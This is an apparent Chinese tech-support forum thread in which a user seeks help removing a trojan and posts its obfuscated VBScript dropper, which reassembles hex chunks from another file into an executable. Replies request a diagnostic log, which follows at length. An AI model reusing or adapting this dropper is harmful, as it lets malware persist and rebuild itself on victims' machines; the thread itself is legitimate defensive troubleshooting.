trojan.win32.vb.eks: can anyone remove it?
A .exe file with a random name and two .vbs files get created on the C: drive. Kaspersky flags the EXE as trojan.win32.vb.eks and deletes it automatically, but the .VBS files are still there and keep growing in size; if I delete them they are recreated and Kaspersky flags the virus again. Every now and then an extra CMD.EXE process shows up. A full-disk scan finds nothing. Searching online, everyone says it is related to being online (with the network disconnected nothing gets flagged), but nobody knows the cause or how to remove it.
Attached is the code of one of the VBS files; the other one is nothing but digits and letters when opened. Is there an expert who can solve this?
[code]
oN ErROR reSUmE nexT:S=1:Do:sEt G=CREaTeoBjeCt("ScrIptiNG.fILESYSTEMObJECT"):do WHILe G.filEexISTs("C:\flznfi.vbs")=fALSe:wSCRIPT.sleep(1000):LOOp:SEt f=g.opEntExtfILE("C:\flznfi.vbs",1):do WHile F.ATenDoFStREam=fALSe:l=f.REAdLiNe:O=leN(L):n=LEFt(L,2):SElecT CAsE trUE:caSe ISnUmeRIc(N)=FAlSe:casE o=3947+3 ANd InT(N)=S:E=e+miD(L,3,3947):s=S+1:cAse o=3671+3 and iNt(n)=S:E=E+MId(l,3,3671):s=S+1:eNd sElecT:lOop:F.ClOSe:If 60+1=S THEn:J=len(E)/2:SeT V=CreaTEoBJECT("aDOdB.REcoRDset"):v.fiElds.aPPeNd "m",205,j:V.oPeN:v.ADdnew:V("M")=E:v.upDATe:E=V("m").gETcHUNK(j):wiTh CREaTeOBJECt("AdOdB.STrEam"):.MODe=3:.Type=1:.OpeN():.write e:.SAVeTOFilE "C:\qqionjy.exe",2:enD wItH:wSCript.qUiT:eNd iF:WSCRIpT.Sleep(200):LoOp
[/code]

Please run an SREng scan and post the log.

Better to upload the files so we can take a look.

Without an SREng log, not even a god could save you.
Try this:
Windows清理助手 (Windows Cleanup Assistant) [url]http://www.greendown.cn/soft/4421.html[/url]

Here is the SREng log; experts, please take a look.
[code]
2008-08-29,14:12:56
System Repair Engineer 2.6.12.1018
Smallfrogs (http://www.KZTechs.com)
Windows XP Professional Service Pack 2 (Build 2600) - 管理权限用户 - 完整功能
以下内容被选中:
所有的启动项目(包括注册表、启动文件夹、服务等)
浏览器加载项
正在运行的进程(包括进程模块信息)
文件关联
Winsock 提供者
Autorun.inf
HOSTS 文件
进程特权扫描
启动项目
注册表
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
<ctfmon.exe><C:\WINDOWS\system32\ctfmon.exe> [(Verified)Microsoft Windows Publisher]
<AlfaClock Classic><"D:\Program Files\AlfaClock\AlfaClock.exe" /startup> [AlfaSoft Research Labs]
<RAMSaverPro><c:\Program Files\WinTools\RAM Saver Pro\ramsaverpro.exe> []
<Fetion><D:\Program Files\China Mobile\Fetion\Fetion.exe> [China Mobile]
[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows]
<load><> [N/A]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<cFosSpeed><C:\Program Files\cFosSpeed\cFosSpeed.exe> [cFos Software GmbH]
<AVP><"C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\avp.exe"> [(Verified)Kaspersky Lab]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
<shell><Explorer.exe> [(Verified)Microsoft Windows Component Publisher]
<Userinit><C:\WINDOWS\system32\userinit.exe,> [(Verified)Microsoft Windows Publisher]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows]
<AppInit_DLLs><> [N/A]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
<UIHost><logonui.exe> [(Verified)Microsoft Windows Publisher]
[HKEY_CURRENT_USER\Control Panel\Desktop]
<SCRNSAVE.EXE><C:\WINDOWS\system32\LCD-SVR.SCR> [Gate2.NET, contact: admin@Gate2.NET]
==================================
启动文件夹
[adsl]
<C:\Documents and Settings\cyscys\「开始」菜单\程序\启动\adsl.lnk --> [File is missing]><N>
==================================
服务
[Ati HotKey Poller / Ati HotKey Poller][Stopped/Disabled]
<C:\WINDOWS\system32\Ati2evxx.exe><ATI Technologies Inc.>
[ATI Smart / ATI Smart][Stopped/Manual Start]
<C:\WINDOWS\system32\ati2sgag.exe><>
[卡巴斯基反病毒软件 7.0 / AVP][Running/Auto Start]
<"C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\avp.exe" -r><Kaspersky Lab>
[cFosSpeed System Service / cFosSpeedS][Running/Auto Start]
<"C:\Program Files\cFosSpeed\spd.exe" -service><cFos Software GmbH>
[Clip Book server / Clip Book server][Stopped/Auto Start]
<C:\Program Files\Internet Explorer\help.com><(File is missing)>
[Cmb WebProtect Support / CMBWPS][Running/Auto Start]
<C:\Program Files\CMBCHINA\WebProtect\WPService.exe /start><China Merchants Bank>
[Google Updater Service / gusvc][Stopped/Disabled]
<"C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe"><Google>
[ServiceLayer / ServiceLayer][Stopped/Manual Start]
<"C:\Program Files\PC Connectivity Solution\ServiceLayer.exe"><Nokia.>
[Windows Live Setup Service / WLSetupSvc][Stopped/Manual Start]
<"C:\Program Files\Windows Live\installer\WLSetupSvc.exe"><Microsoft Corporation>
==================================
驱动程序
[标准 IDE/ESDI 硬盘控制器 / atapi][Running/Boot Start]
<\SystemRoot\system32\DRIVERS\atapi.sys><N/A>
[ati2mtag / ati2mtag][Running/Manual Start]
<system32\DRIVERS\ati2mtag.sys><ATI Technologies Inc.>
[cFosSpeed Miniport / cFosSpeed][Running/Manual Start]
<system32\DRIVERS\cfosspeed.sys><cFos Software GmbH>
[CMB8100 / CMB8100][Running/Auto Start]
<\??\C:\WINDOWS\system32\Drivers\CertClient.dat><N/A>
[CMBProtector / CMBProtector][Running/Auto Start]
<\??\C:\WINDOWS\system32\Drivers\CMBProtector.dat><N/A>
[d346bus / d346bus][Running/Boot Start]
<\SystemRoot\system32\DRIVERS\d346bus.sys><>
[d346prt / d346prt][Running/Boot Start]
<\SystemRoot\System32\Drivers\d346prt.sys><>
[VIA PCI 10/100Mb Fast Ethernet Adapter NT Driver / FETNDIS][Stopped/Manual Start]
<system32\DRIVERS\fetnd5.sys><VIA Technologies, Inc.>
[kl1 / kl1][Running/Boot Start]
<\SystemRoot\system32\drivers\kl1.sys><Kaspersky Lab>
[klif / klif][Running/System Start]
<\??\C:\WINDOWS\system32\drivers\klif.sys><Kaspersky Lab>
[Kaspersky Anti-Virus NDIS Filter / klim5][Running/Manual Start]
<system32\DRIVERS\klim5.sys><Kaspersky Lab>
[Nokia USB Phone Parent / nmwcd][Stopped/Manual Start]
<system32\drivers\nmwcd.sys><Nokia>
[Nokia USB Generic / nmwcdc][Stopped/Manual Start]
<system32\drivers\nmwcdc.sys><Nokia>
[Nokia USB Port / nmwcdcj][Stopped/Manual Start]
<system32\drivers\nmwcdcj.sys><Nokia>
[Nokia USB Modem / nmwcdcm][Stopped/Manual Start]
<system32\drivers\nmwcdcm.sys><Nokia>
[Direct Parallel Link Driver / Ptilink][Running/Manual Start]
<system32\DRIVERS\ptilink.sys><Parallel Technologies, Inc.>
[Realtek RTL8029(AS)-based PCI Ethernet Adapter NT Driver / rtl8029][Running/Manual Start]
<system32\DRIVERS\RTL8029.SYS><Realtek Semiconductor Corporation>
[Secdrv / Secdrv][Stopped/Manual Start]
<system32\DRIVERS\secdrv.sys><N/A>
[viamraid / viamraid][Running/Boot Start]
<\SystemRoot\system32\DRIVERS\viamraid.sys><VIA Technologies inc,.ltd>
[VIA AC'97 Audio Controller (WDM) / VIAudio][Running/Manual Start]
<system32\drivers\viaudio.sys><VIA Technologies, Inc.>
[videX32 / videX32][Running/Boot Start]
<\SystemRoot\system32\DRIVERS\videX32.sys><VIA Technologies, Inc.>
[WINIO / WINIO][Stopped/Manual Start]
<\??\D:\Program Files\按键精灵\winio.sys><N/A>
==================================
浏览器加载项
[ThunderAtOnce Class]
{01443AEC-0FD1-40fd-9C87-E93D1494C233} <D:\Program Files\Thunder Network\Thunder\ComDlls\TDAtOnce_Now.dll, (Signed) Thunder Networking Technologies,LTD>
[WebProtect]
{53763D1D-9CA8-4C7C-9756-A8E6B8FC063B} <C:\Program Files\CMBCHINA\WebProtect\WebProtect.dll, (Signed) China Merchants Bank>
[]
{7E853D72-626A-48EC-A868-BA8D5E23E045} <, >
[Thunder Browser Helper]
{889D2FEB-5411-4565-8998-1DD2C5261283} <D:\Program Files\Thunder Network\Thunder\ComDlls\xunleiBHO_Now.dll, (Signed) Thunder Networking Technologies,LTD>
[TN插件]
{960571B5-9178-4F29-B366-0585C526BAB0} <C:\WINDOWS\system32\TNBHO.dll, tntn8.Com>
[Google Toolbar Helper]
{AA58ED58-01DD-4d91-8333-CF10577473F7} <c:\program files\google\googletoolbar1.dll, (Signed) Google Inc.>
[Google Toolbar Notifier BHO]
{AF69DE43-7D58-4638-B6FA-CE66B5AD205D} <C:\Program Files\Google\GoogleToolbarNotifier\2.0.301.7164\swg.dll, (Signed) Google Inc.>
[Web 反病毒统计]
{1F460357-8A94-4D71-9CA3-AA4ACF32ED8E} <C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\SCIEPlgn.dll, (Signed) Kaspersky Lab>
[信息检索(&R)]
{92780B25-18CC-41C8-B9BE-3C9C571A8263} <C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL, (Signed) Microsoft Corporation>
[&Google]
{2318C2B1-4965-11d4-9B18-009027A5CD4F} <c:\program files\google\googletoolbar1.dll, (Signed) Google Inc.>
[EditCtrl Class]
{488A4255-3236-44B3-8F27-FA1AECAA8844} <C:\WINDOWS\system32\aliedit\aliedit.dll, (Signed) >
[UploadControl Control]
{52FF336D-A05D-4A14-A3A1-7B6B4B427F88} <C:\WINDOWS\system32\UPLOAD~1.OCX, 广州网易互动娱乐有限公司>
[163Uploader Control]
{8686F2A6-DC01-4E8F-BDE3-DCC7DBBAD6AE} <C:\WINDOWS\system32\163UPL~1.OCX, 广州网易互动娱乐有限公司>
[AxSubmitControl Class]
{8D9E0B29-563C-4226-86C1-5FF2AE77E1D2} <C:\WINDOWS\DOWNLO~1\SUBMIT~1.DLL, >
[SopCore Control]
{8FEFF364-6A5F-4966-A917-A3AC28411659} <C:\PROGRA~1\SopCast\sopocx.ocx, www.sopcast.com>
[Shockwave Flash Object]
{D27CDB6E-AE6D-11CF-96B8-444553540000} <C:\WINDOWS\system32\Macromed\Flash\Flash9e.ocx, (Signed) Adobe Systems, Inc.>
[ThunderAtOnce Class]
{01443AEC-0FD1-40FD-9C87-E93D1494C233} <D:\Program Files\Thunder Network\Thunder\ComDlls\TDAtOnce_Now.dll, (Signed) Thunder Networking Technologies,LTD>
[]
{09BA8F6D-CB54-424B-839C-C2A6C8E6B436} <, >
[]
{0A155D3C-68E2-4215-A47A-E800A446447A} <, >
[EWA Control]
{18226BF8-DC0B-4D81-80E9-A41AE37BB73A} <C:\PROGRA~1\PPLive\SYNACA~2.OCX, (Signed) Synacast>
[]
{1F460357-8A94-4D71-9CA3-AA4ACF32ED8E} <, >
[Windows Media Player]
{22D6F312-B0F6-11D0-94AB-0080C74C7E95} <C:\WINDOWS\system32\wmpdxm.dll, (Signed) Microsoft Corporation>
[&Google]
{2318C2B1-4965-11D4-9B18-009027A5CD4F} <c:\program files\google\googletoolbar1.dll, (Signed) Google Inc.>
[HTML Document]
{25336920-03F9-11CF-8FD0-00AA00686F13} <%SystemRoot%\system32\mshtml.dll, (Signed) N/A>
[xsey.lnuvsm]
{2BD1B2F3-CF67-4101-9E4E-FCDCD8F103F5} <, >
[DHTML Edit Control Safe for Scripting for IE5]
{2D360201-FFF5-11D1-8D03-00A0C959BC0A} <C:\Program Files\Common Files\Microsoft Shared\Triedit\dhtmled.ocx, (Signed) Microsoft Corporation>
[Tabular Data Control]
{333C7BC4-460F-11D0-BC04-0080C7055A83} <C:\WINDOWS\system32\tdc.ocx, (Signed) Microsoft Corporation>
[]
{3AA9CF07-DF20-48FF-98BE-DED276E40146} <, >
[Thunder Agent Class]
{485463B7-8FB2-4B3B-B29B-8B919B0EACCE} <D:\Program Files\Thunder Network\Thunder\ComDlls\ThunderAgent_Now.dll, Thunder Networking Technologies,LTD>
[EditCtrl Class]
{488A4255-3236-44B3-8F27-FA1AECAA8844} <C:\WINDOWS\system32\aliedit\aliedit.dll, (Signed) >
[HHCtrl Object]
{52A2AAAE-085D-4187-97EA-8C30DB990436} <C:\WINDOWS\system32\hhctrl.ocx, (Signed) Microsoft Corporation>
[WebProtect]
{53763D1D-9CA8-4C7C-9756-A8E6B8FC063B} <C:\Program Files\CMBCHINA\WebProtect\WebProtect.dll, (Signed) China Merchants Bank>
[]
{5CB840B5-A94E-4AD9-B785-4866E3B04476} <, >
[WUWebControl Class]
{6414512B-B978-451D-A0D8-FCFDF33E833C} <C:\WINDOWS\system32\wuweb.dll, (Signed) Microsoft Corporation>
[XMP Class]
{6483F145-A768-4C41-AACC-52D4D7845851} <C:\Documents and Settings\All Users\Application Data\Thunder Network\KanKan\xplayer.dll_1_work, >
[XDRM]
{693571CB-54A3-4E90-9D52-EEAE1334E2D3} <C:\Documents and Settings\All Users\Application Data\Thunder Network\KanKan\xdrm.dll_1_work, >
[Windows Media Player]
{6BF52A52-394A-11D3-B153-00C04F79FAA6} <C:\WINDOWS\system32\wmp.dll, (Signed) Microsoft Corporation>
[WangWangObj Class]
{6E213FC7-DD5A-4115-B7E6-D4C7838C361E} <D:\Program Files\Alisoft\WangWang\WangWangX4.dll, 阿里巴巴软件(上海)有限公司>
[]
{6E5E167B-1566-4316-B27F-0DDAB3484CF7} <, >
[Active Desktop Mover]
{72267F6A-A6F9-11D0-BC94-00C04FB67863} <%SystemRoot%\system32\SHELL32.dll, (Signed) N/A>
[AxInputControl Class]
{73E4740C-08EB-4133-896B-8D0A7C9EE3CD} <C:\WINDOWS\DOWNLO~1\INPUTC~1.DLL, >
[MediaComm Class]
{7670648D-461B-42AF-BDFE-46D26AF5EFF2} <d:\Program Files\Thunder Network\Thunder\Components\InMedia\MediaAddin14.dll, Thunder Networking Technologies,LTD>
[]
{78ABDC59-D8E7-44D3-9A76-9A0918C52B4A} <, >
[]
{7E853D72-626A-48EC-A868-BA8D5E23E045} <, >
[]
{7FC22A16-79E6-4787-9C96-B6359BB1106D} <, >
[Microsoft Web 浏览器]
{8856F961-340A-11D0-A96B-00C04FD705A2} <C:\WINDOWS\system32\shdocvw.dll, (Signed) Microsoft Corporation>
[Thunder Browser Helper]
{889D2FEB-5411-4565-8998-1DD2C5261283} <D:\Program Files\Thunder Network\Thunder\ComDlls\xunleiBHO_Now.dll, (Signed) Thunder Networking Technologies,LTD>
[AxSubmitControl Class]
{8D9E0B29-563C-4226-86C1-5FF2AE77E1D2} <C:\WINDOWS\DOWNLO~1\SUBMIT~1.DLL, >
[SopCore Control]
{8FEFF364-6A5F-4966-A917-A3AC28411659} <C:\PROGRA~1\SopCast\sopocx.ocx, www.sopcast.com>
[]
{92780B25-18CC-41C8-B9BE-3C9C571A8263} <, >
[TN插件]
{960571B5-9178-4F29-B366-0585C526BAB0} <C:\WINDOWS\system32\TNBHO.dll, tntn8.Com>
[RMGetLicense Class]
{A9FC132B-096D-460B-B7D5-1DB0FAE0C062} <C:\WINDOWS\system32\msnetobj.dll, (Signed) Microsoft Corporation>
[Google Toolbar Helper]
{AA58ED58-01DD-4D91-8333-CF10577473F7} <c:\program files\google\googletoolbar1.dll, (Signed) Google Inc.>
[Thunder DapCtrl]
{ACACC6EB-1FBA-4E13-A729-53AEB2DF54F8} <d:\Program Files\Thunder Network\Thunder\Components\DownAndPlay\DapCtrl1.2.11.14.475.dll, ShenZhen Thunder Networking Technologies Ltd.>
[Microsoft Scriptlet Component]
{AE24FDAE-03C6-11D1-8B76-0080C744F389} <C:\WINDOWS\system32\mshtml.dll, (Signed) Microsoft Corporation>
[Google Toolbar Notifier BHO]
{AF69DE43-7D58-4638-B6FA-CE66B5AD205D} <C:\Program Files\Google\GoogleToolbarNotifier\2.0.301.7164\swg.dll, (Signed) Google Inc.>
[SearchAssistantOC]
{B45FF030-4447-11D2-85DE-00C04FA35C89} <%SystemRoot%\system32\shdocvw.dll, (Signed) N/A>
[RDS.DataSpace]
{BD96C556-65A3-11D0-983A-00C04FC29E36} <C:\Program Files\Common Files\System\msadc\msadco.dll, (Signed) Microsoft Corporation>
[]
{CA828031-4325-11D4-BDB2-00105A776E78} <, >
[AUDIO__MP3 Moniker Class]
{CD3AFA76-B84F-48F0-9393-7EDC34128127} <C:\WINDOWS\system32\wmp.dll, (Signed) Microsoft Corporation>
[AUDIO__X_MS_WMA Moniker Class]
{CD3AFA84-B84F-48F0-9393-7EDC34128127} <C:\WINDOWS\system32\wmp.dll, (Signed) Microsoft Corporation>
[Shockwave Flash Object]
{D27CDB6E-AE6D-11CF-96B8-444553540000} <C:\WINDOWS\system32\Macromed\Flash\Flash9e.ocx, (Signed) Adobe Systems, Inc.>
[]
{DC7094C6-8F61-42ED-AECE-63F5EEF647C5} <, >
[Thunder DapPlayer]
{EEDD6FF9-13DE-496B-9A1C-D78B3215E266} <d:\Program Files\Thunder Network\Thunder\Components\DownAndPlay\DapPlayer3.0.40.64.475.dll, ShenZhen Thunder Networking Technologies Ltd.>
[XPPlayer Class]
{F3E70CEA-956E-49CC-B444-73AFE593AD7F} <C:\Documents and Settings\All Users\Application Data\Thunder Network\KanKan\pplayer.dll_1_work, Thunder>
[]
{FB5F1910-F110-11D2-BB9E-00C04F795683} <, >
[使用迅雷下载]
<D:\Program Files\Thunder Network\Thunder\Program\geturl.htm, N/A>
[使用迅雷下载全部链接]
<D:\Program Files\Thunder Network\Thunder\Program\getallurl.htm, N/A>
[导出到 Microsoft Office Excel(&X)]
<res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000, N/A>
[用比特精灵下载(&B)]
<D:\Program Files\BitSpirit\bsurl.htm, N/A>
[设为 Messenger Live 头像]
<C:\Program Files\MSNShell\Bin\SetMSNDP.htm, N/A>
==================================
正在运行的进程
[PID: 1000 / SYSTEM][\SystemRoot\System32\smss.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 1164 / SYSTEM][\??\C:\WINDOWS\system32\csrss.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 1196 / SYSTEM][\??\C:\WINDOWS\system32\winlogon.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[C:\WINDOWS\system32\Ati2evxx.dll] [ATI Technologies Inc., 6.14.10.4176]
[C:\WINDOWS\system32\msacm32.drv] [Microsoft Corporation, 5.1.2600.0 (xpclient.010817-1148)]
[C:\WINDOWS\system32\msadp32.acm] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 1240 / SYSTEM][C:\WINDOWS\system32\services.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 1252 / SYSTEM][C:\WINDOWS\system32\lsass.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 1408 / SYSTEM][C:\WINDOWS\system32\svchost.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 1508 / NETWORK SERVICE][C:\WINDOWS\system32\svchost.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 1620 / SYSTEM][C:\WINDOWS\System32\svchost.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 1780 / LOCAL SERVICE][C:\WINDOWS\system32\svchost.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 1884 / SYSTEM][C:\WINDOWS\system32\spoolsv.exe] [Microsoft Corporation, 5.1.2600.2696 (xpsp_sp2_gdr.050610-1519)]
[C:\WINDOWS\system32\mdimon.dll] [Microsoft Corporation, 11.3.2175.0]
[C:\WINDOWS\System32\spool\PRTPROCS\W32X86\mdippr.dll] [Microsoft Corporation, 11.3.2175.0]
[PID: 372 / cyscys][C:\WINDOWS\Explorer.EXE] [Microsoft Corporation, 6.00.2900.3156 (xpsp_sp2_gdr.070613-1234)]
[D:\Program Files\AlfaClock\TrayClock.dll] [N/A, ]
[C:\WINDOWS\system32\msacm32.drv] [Microsoft Corporation, 5.1.2600.0 (xpclient.010817-1148)]
[D:\Program Files\Thunder Network\Thunder\ComDlls\TDAtOnce_Now.dll] [Thunder Networking Technologies,LTD, 1.0.5.29]
[D:\Program Files\Thunder Network\Thunder\Components\ResWorker\DsBho_00.dll] [Thunder Networking Technologies,LTD, 1, 0, 0, 18]
[D:\Program Files\Thunder Network\Thunder\Components\ResWorker\DataProcessor_00.dll] [Thunder Networking Technologies,LTD, 1, 0, 0, 16]
[C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\prremote.dll] [Kaspersky Lab, 7.0.1.325]
[C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\prloader.dll] [Kaspersky Lab, 7.0.1.325]
[PID: 520 / cyscys][C:\Program Files\cFosSpeed\cFosSpeed.exe] [cFos Software GmbH, 3.11.1177]
[PID: 576 / cyscys][C:\WINDOWS\system32\ctfmon.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 604 / cyscys][D:\Program Files\AlfaClock\AlfaClock.exe] [AlfaSoft Research Labs, 1.8.2.722]
[D:\Program Files\AlfaClock\TrayClock.dll] [N/A, ]
[C:\WINDOWS\system32\msacm32.drv] [Microsoft Corporation, 5.1.2600.0 (xpclient.010817-1148)]
[PID: 632 / cyscys][C:\Program Files\WinTools\RAM Saver Pro\ramsaverpro.exe] [N/A, ]
[PID: 728 / SYSTEM][C:\Program Files\cFosSpeed\spd.exe] [cFos Software GmbH, 3.11.1177]
[PID: 760 / SYSTEM][C:\Program Files\CMBCHINA\WebProtect\WPService.exe] [China Merchants Bank, 1, 0, 0, 1]
[C:\Program Files\CMBCHINA\WebProtect\WebProtectPlus.dll] [China Merchants Bank, 1, 0, 0, 1]
[PID: 864 / SYSTEM][C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE] [Microsoft Corporation, 7.00.9466]
[C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\2052\mdmui.dll] [Microsoft Corporation, 7.00.9466]
[PID: 1036 / SYSTEM][C:\WINDOWS\system32\svchost.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 2172 / cyscys][D:\Program Files\BitSpirit\BitSpirit.exe] [LANSPIRIT.NET, 3.3.2.100]
[D:\Program Files\BitSpirit\BSOPLIB.DLL] [, 1, 0, 0, 3]
[C:\WINDOWS\system32\msacm32.drv] [Microsoft Corporation, 5.1.2600.0 (xpclient.010817-1148)]
[PID: 3260 / cyscys][C:\WINDOWS\explorer.exe] [Microsoft Corporation, 6.00.2900.3156 (xpsp_sp2_gdr.070613-1234)]
[D:\Program Files\Thunder Network\Thunder\ComDlls\TDAtOnce_Now.dll] [Thunder Networking Technologies,LTD, 1.0.5.29]
[D:\Program Files\Thunder Network\Thunder\ComDlls\xunleiBHO_Now.dll] [Thunder Networking Technologies,LTD, 5, 0, 8, 55]
[D:\Program Files\Thunder Network\Thunder\Components\ResWorker\DsBho_00.dll] [Thunder Networking Technologies,LTD, 1, 0, 0, 18]
[D:\Program Files\Thunder Network\Thunder\Components\ResWorker\DataProcessor_00.dll] [Thunder Networking Technologies,LTD, 1, 0, 0, 16]
[C:\Program Files\Microsoft Office\OFFICE11\msohev.dll] [Microsoft Corporation, 11.0.5510]
[d:\Program Files\WinRAR\rarext.dll] [N/A, ]
[C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\ShellEx.dll] [Kaspersky Lab, 7.0.1.325]
[d:\Program Files\EditPlus 3\eppshell.dll] [N/A, ]
[C:\WINDOWS\system32\contmenu.dll] [N/A, ]
[C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\prremote.dll] [Kaspersky Lab, 7.0.1.325]
[C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\prloader.dll] [Kaspersky Lab, 7.0.1.325]
[C:\Program Files\Nokia\Nokia PC Suite 6\phonebrowser.dll] [Nokia, 6, 85, 89, 5]
[C:\Program Files\Nokia\Nokia PC Suite 6\PCSCM.dll] [Nokia, 6, 85, 107, 6]
[C:\Program Files\Nokia\Nokia PC Suite 6\Lang\PhoneBrowser_chi-sc.nlr] [Nokia, 6, 85, 59, 0]
[C:\Program Files\Nokia\Nokia PC Suite 6\Resource\PhoneBrowser_Nokia.ngr] [Nokia, 6, 85, 17, 0]
[PID: 2276 / cyscys][C:\Program Files\Windows Live\Messenger\msnmsgr.exe] [Microsoft Corporation, 8.5.1302.1018]
[C:\Program Files\Windows Live\Messenger\MSNCore.dll] [Microsoft Corporation, 8.5.1302.1018]
[C:\Program Files\Windows Live\Messenger\msidcrl40.dll] [Microsoft Corporation, 4.100.313.1]
[C:\Program Files\Windows Live\Messenger\ContactsUX.dll] [Microsoft Corporation, 8.5.1302.1018]
[C:\Program Files\Windows Live\Messenger\CRYPTNET.dll] [N/A, ]
[C:\Program Files\MSNShell\Bin\ShellDll02.dll] [MSNShell Team, 4.3.11.12]
[C:\Program Files\Windows Live\Messenger\msgslang.8.5.1302.1018.dll] [Microsoft Corporation, 8.5.1302.1018]
[C:\Program Files\Windows Live\Messenger\msgsres.dll] [Microsoft Corporation, 8.5.1302.1018]
[C:\Program Files\MSNShell\Bin\ShellDll.dll] [N/A, ]
[C:\Program Files\Windows Live\Messenger\MSGSWCAM.dll] [Microsoft Corporation, 8.5.1302.1018]
[C:\WINDOWS\system32\sirenacm.dll] [Microsoft Corporation, 8.5.1302.1018]
[C:\WINDOWS\system32\msdmo.dll] [, ]
[C:\Program Files\Windows Live\Messenger\lmcdata.dll] [Microsoft Corporation, 8.5.1302.1018]
[C:\Program Files\Windows Live\Messenger\contact.dll] [Microsoft Corporation, 8.5.1302.1018]
[C:\Program Files\Windows Live\Messenger\custsat.dll] [Microsoft Corporation, 9.0.3790.2428 (srv03_sp1_qfe.050422-1043)]
[C:\Program Files\Windows Live\Messenger\abssm.dll] [Microsoft Corporation, 8.5.1302.1018]
[C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\scrchpg.dll] [Kaspersky Lab, 7.0.1.325]
[C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\klscav.dll] [Kaspersky Lab, 7.0.1.325]
[C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\prremote.dll] [Kaspersky Lab, 7.0.1.325]
[C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\prloader.dll] [Kaspersky Lab, 7.0.1.325]
[C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\prkernel.ppl] [Kaspersky Lab, 7.0.1.325]
[c:\program files\kaspersky lab\kaspersky anti-virus 7.0\params.ppl] [Kaspersky Lab, 7.0.1.325]
[c:\program files\kaspersky lab\kaspersky anti-virus 7.0\pxstub.ppl] [Kaspersky Lab, 7.0.1.325]
[c:\program files\kaspersky lab\kaspersky anti-virus 7.0\tempfile.ppl] [Kaspersky Lab, 7.0.1.325]
[C:\WINDOWS\system32\msacm32.drv] [Microsoft Corporation, 5.1.2600.0 (xpclient.010817-1148)]
[C:\WINDOWS\system32\SOGOUPY.IME] [Sohu.com Inc., 3, 1, 0, 0]
[C:\Program Files\SogouInput\Plugin\SgImeWord.dll] [, 1, 0, 0, 31]
[C:\WINDOWS\system32\Macromed\Flash\Flash9e.ocx] [Adobe Systems, Inc., 9,0,115,0]
[PID: 2272 / cyscys][C:\WINDOWS\system32\taskmgr.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 3904 / cyscys][D:\Program Files\maxthon\Maxthon.exe] [Maxthon International Ltd., 1, 5, 9, 80]
[D:\Program Files\maxthon\maxzlib.dll] [ , 1, 0, 0, 2]
[C:\WINDOWS\system32\odbcbcp.dll] [Microsoft Corporation, 2000.085.1117.00 (xpsp_sp2_rtm.040803-2158)]
[D:\Program Files\maxthon\Services\RealTime\real_time.dll] [, 1, 0, 0, 1]
[C:\WINDOWS\system32\SOGOUPY.IME] [Sohu.com Inc., 3, 1, 0, 0]
[C:\Program Files\SogouInput\Plugin\SgImeWord.dll] [, 1, 0, 0, 31]
[C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\scrchpg.dll] [Kaspersky Lab, 7.0.1.325]
[C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\klscav.dll] [Kaspersky Lab, 7.0.1.325]
[C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\prremote.dll] [Kaspersky Lab, 7.0.1.325]
[C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\prloader.dll] [Kaspersky Lab, 7.0.1.325]
[C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\prkernel.ppl] [Kaspersky Lab, 7.0.1.325]
[c:\program files\kaspersky lab\kaspersky anti-virus 7.0\params.ppl] [Kaspersky Lab, 7.0.1.325]
[c:\program files\kaspersky lab\kaspersky anti-virus 7.0\pxstub.ppl] [Kaspersky Lab, 7.0.1.325]
[c:\program files\kaspersky lab\kaspersky anti-virus 7.0\tempfile.ppl] [Kaspersky Lab, 7.0.1.325]
